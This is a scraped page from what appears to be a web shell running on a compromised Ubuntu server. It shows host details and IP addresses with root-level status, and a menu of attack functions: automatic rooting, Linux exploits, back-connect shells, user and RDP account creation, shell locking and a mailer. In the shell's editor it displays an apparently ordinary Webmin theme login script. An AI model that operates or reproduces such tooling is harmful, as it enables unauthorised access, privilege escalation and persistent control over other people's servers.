Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
webmin /
authentic-theme /
[ HOME SHELL ]
Name
Size
Permission
Action
extensions
[ DIR ]
drwxr-xr-x
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
unauthenticated
[ DIR ]
drwxr-xr-x
401.cgi
342
B
-rwxr-xr-x
403.cgi
342
B
-rwxr-xr-x
404.cgi
342
B
-rwxr-xr-x
CHANGELOG.md
77.62
KB
-rw-r--r--
FUNDING.yml
102
B
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
THEME.pgp
3.04
KB
-rw-r--r--
authentic-funcs.pl
28.56
KB
-rw-r--r--
authentic-init.pl
64.46
KB
-rw-r--r--
authentic-lib.pl
99.71
KB
-rw-r--r--
authentic.pl
52.32
KB
-rw-r--r--
config
139
B
-rw-r--r--
config.cgi
6.52
KB
-rwxr-xr-x
config_save.cgi
2.14
KB
-rwxr-xr-x
index.cgi
309
B
-rwxr-xr-x
manifest.template
920
B
-rw-r--r--
mconfig.cgi
6.57
KB
-rwxr-xr-x
mconfig_save.cgi
1.68
KB
-rwxr-xr-x
navigation-lib.pl
54.64
KB
-rw-r--r--
pam_login.cgi
6.71
KB
-rwxr-xr-x
password_form.cgi
4.07
KB
-rwxr-xr-x
postinstall-usermin.pl
264
B
-rwxr-xr-x
postinstall.pl
645
B
-rwxr-xr-x
service-worker.js
141
B
-rw-r--r--
session_login.cgi
8.55
KB
-rwxr-xr-x
settings-backgrounds.cgi
3.61
KB
-rwxr-xr-x
settings-backgrounds_save.cgi
1.16
KB
-rwxr-xr-x
settings-editor_favorites_read...
897
B
-rwxr-xr-x
settings-editor_favorites_writ...
574
B
-rwxr-xr-x
settings-editor_read.cgi
2.4
KB
-rwxr-xr-x
settings-editor_write.cgi
973
B
-rwxr-xr-x
settings-favorites_save.cgi
632
B
-rwxr-xr-x
settings-lib.pl
651
B
-rw-r--r--
settings-logos.cgi
4.61
KB
-rwxr-xr-x
settings-logos_save.cgi
1.75
KB
-rwxr-xr-x
stats.cgi
8.38
KB
-rwxr-xr-x
sysinfo.cgi
6.4
KB
-rwxr-xr-x
tconfig-lib.pl
33.41
KB
-rw-r--r--
tconfig.cgi
6.1
KB
-rwxr-xr-x
theme-update.sh
8.08
KB
-rwxr-xr-x
theme.info
337
B
-rw-r--r--
theme.info.no
24
B
-rw-r--r--
uconfig.cgi
6.27
KB
-rwxr-xr-x
uconfig_save.cgi
1.99
KB
-rwxr-xr-x
uninstall-usermin.pl
170
B
-rwxr-xr-x
uninstall.pl
346
B
-rwxr-xr-x
xhr-lib.pl
10.22
KB
-rw-r--r--
xhr.cgi
355
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pam_login.cgi
#!/usr/bin/perl # # Authentic Theme (https://github.com/authentic-theme/authentic-theme) # Copyright Ilia Rostovtsev <ilia@virtualmin.com> # Licensed under MIT (https://github.com/authentic-theme/authentic-theme/blob/master/LICENSE) # use strict; our (%in, %gconfig, %tconfig, %text, $config_directory, $current_theme, %theme_text); do($ENV{'THEME_ROOT'} . "/authentic-lib.pl"); my %miniserv; get_miniserv_config(\%miniserv); my $charset = &get_charset(); # Check to add error handler error_40x_handler(); our %theme_config = (settings($config_directory . "/$current_theme/settings.js", 'settings_'), settings($config_directory . "/$current_theme/settings-admin", 'settings_'), settings($config_directory . "/$current_theme/settings-root", 'settings_')); # Show pre-login text banner if ($gconfig{'loginbanner'} && get_env('http_cookie') !~ /banner=1/ && !$in{'logout'} && !$in{'failed'} && !$in{'password'} && !$in{'error'} && $in{'initial'}) { print "Auth-type: auth-required=1\r\n"; print "Set-Cookie: banner=1; path=/\r\n"; &PrintHeader($charset); print '<!DOCTYPE HTML>', "\n"; print '<html data-bgs="' . ( theme_night_mode_login() ? 'nightRider' : 'gainsboro' ) . '" data-night-mode="' . theme_night_mode_login() . '" class="session_login pam_login">', "\n"; embed_login_head(); print '<body class="session_login pam_login" ' . $tconfig{'inbody'} . '>' . "\n"; embed_overlay_prebody(); print '<div class="form-signin-banner container session_login pam_login alert alert-danger" data-dcontainer="1"><i class="fa fa-3x fa-exclamation-triangle"></i><br><br>' . "\n"; my $url = $in{'page'}; open(BANNER, $gconfig{'loginbanner'}); while (<BANNER>) { s/LOGINURL/$url/g; print; } close(BANNER); &footer(); return; } my $sec = lc(get_env('https')) eq 'on' ? "; secure" : ""; if (!$miniserv{'no_httponly'}) { $sec .= "; httpOnly"; } my $sidname = $miniserv{'sidname'} || "sid"; print "Auth-type: auth-required=1\r\n"; print "Set-Cookie: banner=0; path=/$sec\r\n" if ($gconfig{'loginbanner'}); print "Set-Cookie: $sidname=x; path=/$sec\r\n" if ($in{'logout'}); print "Set-Cookie: redirect=1; path=/$sec\r\n"; print "Set-Cookie: testing=1; path=/$sec\r\n"; &PrintHeader($charset); print '<!DOCTYPE HTML>', "\n"; print '<html data-bgs="' . ( theme_night_mode_login() ? 'nightRider' : 'gainsboro' ) . '" data-night-mode="' . theme_night_mode_login() . '" class="session_login pam_login">', "\n"; embed_login_head(); print '<body class="session_login pam_login" ' . $tconfig{'inbody'} . '>' . "\n"; embed_overlay_prebody(); print '<div class="container session_login pam_login" data-dcontainer="1">' . "\n"; if (&miniserv_using_default_cert()) { print '<div class="alert alert-warning" data-defcert>' . "\n"; print '<strong><i class ="fa fa-exclamation-triangle"></i> ' . $theme_text{'login_warning'} . '</strong><br /><span>' . &text('defcert_error', ucfirst(&get_product_name()), ($ENV{'MINISERV_KEYFILE'} || $miniserv{'keyfile'})) . "</span>\n"; print '</div>' . "\n"; } if (defined($in{'failed'})) { print '<div class="alert alert-warning">' . "\n"; print '<strong><i class ="fa fa-exclamation-triangle"></i> ' . $theme_text{'login_warning'} . '</strong><br />' . "\n"; print '<span>' . $theme_text{'theme_xhred_session_failed'} . "</span>\n"; print '</div>' . "\n"; } elsif ($in{'logout'}) { print '<div class="alert alert-success">' . "\n"; print '<strong><i class ="fa fa-check"></i> ' . $theme_text{'login_success'} . '</strong><br />' . "\n"; print '<span>' . $theme_text{'session_logout'} . "</span>\n"; print '</div>' . "\n"; } elsif ($in{'timed_out'}) { print '<div class="alert alert-warning">' . "\n"; print '<strong><i class ="fa fa fa-exclamation-triangle"></i> ' . $theme_text{'login_warning'} . '</strong><br />' . "\n"; print '<span>' . &theme_text('session_timed_out', int($in{'timed_out'} / 60)) . "</span>\n"; print '</div>' . "\n"; } print "$text{'pam_prefix'}\n"; print '<form method="post" action="' . $gconfig{'webprefix'} . '/pam_login.cgi" class="form-signin session_login pam_login clearfix" role="form" onsubmit="spinner()">' . "\n"; print ui_hidden("cid", $in{'cid'}); print '<i class="wbm-webmin"></i><h2 class="form-signin-heading"> <span>' . (&get_product_name() eq 'webmin' ? $theme_text{'theme_xhred_titles_wm'} : $theme_text{'theme_xhred_titles_um'} ) . '</span></h2>' . "\n"; # Process logo embed_logo(); # Login message my $host; if ($gconfig{'realname'}) { $host = &get_system_hostname(); } else { $host = get_env('server_name'); $host =~ s/:\d+//g; $host = &html_escape($host); } my $autocompleteuser = $gconfig{'noremember'} ? "autocomplete=off" : "autocomplete=username"; print '<p class="form-signin-paragraph">' . text($gconfig{'nohostname'} ? 'pam_mesg2' : 'pam_mesg', "<br><strong>$host</strong>") . "\n"; if (!$in{'password'}) { print '<div class="input-group form-group">' . "\n"; print '<input type="text" class="form-control session_login pam_login" name="answer" ' . $autocompleteuser . ' autocorrect="off" autocapitalize="none" placeholder="' . &theme_text('theme_xhred_login_user') . '" ' . ' autofocus>' . "\n"; print '<span class="input-group-addon"><i class="fa fa-fw fa-user"></i></span>' . "\n"; print '</div>' . "\n"; } else { print '<div class="input-group form-group">' . "\n"; print '<input type="' . ($in{'question'} =~ /code/i ? 'text' : 'password') . '" class="form-control session_login pam_login" name="answer" autocomplete="off" autocorrect="off" placeholder="' . ($in{'question'} =~ /code/i ? theme_text('theme_xhred_login_passphrase') : theme_text('theme_xhred_login_pass')) . '" autofocus>' . "\n"; print '<span class="input-group-addon"><i class="fa fa-fw fa-' . ($in{'question'} =~ /code/i ? 'qrcode' : ' fa2 fa2-key') . '"></i></span>' . "\n"; print '</div>' . "\n"; } print '<div class="form-group form-signin-group">'; print '<button class="btn btn-primary" type="submit"><i class="fa fa-sign-in"></i> ' . ($in{'password'} ? &theme_text('pam_login') : &theme_text('login_signin')) . '</button>' . "\n"; if (!$in{'password'}) { if ($text{'session_postfix'} =~ "href") { my $link = get_link($text{'session_postfix'}, 'ugly'); print '<a target="_blank" href=' . $link->[0] . ' class="btn btn-warning"><i class="fa fa-unlock"></i> ' . $link->[1] . '</a>' . "\n"; } } print '</div>'; print '</form>' . "\n"; print "$text{'pam_postfix'}\n"; &footer();
Close